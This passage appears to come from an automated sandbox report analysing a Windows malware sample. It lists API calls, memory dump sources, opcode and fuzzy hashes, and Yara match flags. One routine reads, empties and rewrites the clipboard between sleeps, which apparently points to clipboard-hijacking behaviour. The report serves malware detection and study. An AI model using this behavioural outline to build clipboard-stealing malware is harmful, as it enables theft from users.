                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 0040299F
                                                                                                                                                                                                                                          • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2843524283-0
                                                                                                                                                                                                                                        • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                        • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000400,?,?,02120223,?,?), ref: 02120E19
                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,02120223,?,?), ref: 02120E1E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                        • Instruction ID: 44aadaba4ceec3c7039f90236b980d150b62195d6aed535f06090d2979b601d5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68D012311451287BD7002A94DC09BCD7B1CDF09B66F108011FB0DD9080C770954046E5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                        • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                                                                                                                        • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                        • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 323602529-0
                                                                                                                                                                                                                                        • Opcode ID: 7df3e409c6b59b8aa831ab12f760028bd04ff3d894a0208e97c09ec0715edeee
                                                                                                                                                                                                                                        • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7df3e409c6b59b8aa831ab12f760028bd04ff3d894a0208e97c09ec0715edeee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: H_prolog3_catch
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3886170330-0
                                                                                                                                                                                                                                        • Opcode ID: caa3fed0a7f872be89a083567e545f4644478fb9da4458cd4b1d938140bf4f95
                                                                                                                                                                                                                                        • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: caa3fed0a7f872be89a083567e545f4644478fb9da4458cd4b1d938140bf4f95
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                                                                                                                        • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                        • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                        • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                        • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                        • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2005118841-0
                                                                                                                                                                                                                                        • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                        • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                        • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                        • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 004B04B6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4b0000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction ID: 1d7c54f9b752043f7fd156f200c53e1b36436ed6ca17afae0d88c3c60b4dbe96
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A116C79A00208EFCB01DF98CA85E99BBF1EF08351F058095FA489B362D335EA50DF90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0212194D
                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001541), ref: 02121957
                                                                                                                                                                                                                                          • Part of subcall function 0212CE77: _strlen.LIBCMT ref: 0212CE8E
                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 02121984
                                                                                                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 02121994
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 021219B0
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 021219DF
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 02121B23
                                                                                                                                                                                                                                        • EmptyClipboard.USER32 ref: 02121B39
                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000001), ref: 02121B46
                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02121B70
                                                                                                                                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 02121B79
                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 02121B80
                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 02121BA4
                                                                                                                                                                                                                                        • Sleep.KERNEL32(000002D2), ref: 02121BAF
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                        • String ID: 4#E$i
                                                                                                                                                                                                                                        • API String ID: 4246938166-2480119546
                                                                                                                                                                                                                                        • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                        • Instruction ID: 13c71eda43c7430e2934dac0d436295253fa47ecdf24b743a7c2b671904bebdf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE513531C403A4EED321DFA8ED457EC7B74FF1A306F015225E905A2163EB708689CBA9
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0212239C
                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 021223B1
                                                                                                                                                                                                                                        • GetDC.USER32(?), ref: 021223B8
                                                                                                                                                                                                                                        • CreateSolidBrush.GDI32(00646464), ref: 021223CB
                                                                                                                                                                                                                                        • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021223EA
                                                                                                                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0212240B
                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 02122416
                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00000008,00000000), ref: 0212241F
                                                                                                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02122443
                                                                                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 021224CE
                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 021224E6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1529870607-0
                                                                                                                                                                                                                                        • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                        • Instruction ID: 118d8ada6abde20bc900316c5a4ce3c385c53fc7a631e8bff582dbe301a7bf7a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2271ED72900228AFDB229F64DD85FAEBBBCEF09751F0041A5F509E6155DA70AF84CF20
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                        • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                        • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0215BCF4,?,00000000), ref: 0215BA6E
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0215BCF4,?,00000000), ref: 0215BA97
                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,0215BCF4,?,00000000), ref: 0215BAAC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                        • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                        • Instruction ID: 377f89e761478b388b7726438b639d6bfc4997163f4bfc8800fb3d99fd597b4f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9121A432688124EAEB348F54D901BA7B3A6FB40E5CB5784A5FD2AD7108F732DB40C390
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                        • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                        • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 021521A0
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521AD
                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0215BCB5
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0215BD10
                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0215BD1F
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,02150A1C,00000040,?,02150B3C,00000055,00000000,?,?,00000055,00000000), ref: 0215BD67
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,02150A9C,00000040), ref: 0215BD86
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2287132625-0
                                                                                                                                                                                                                                        • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                        • Instruction ID: 0dbc46593606c6cba40b4b4860aa19400b2af7716b5799c0989cf7ccc27a9dbc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC51A371944229EFDB20DFA5CC40ABE77B9EF04708F0404A9ED24EB294EB719B01CB65
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2287132625-0
                                                                                                                                                                                                                                        • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                        • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
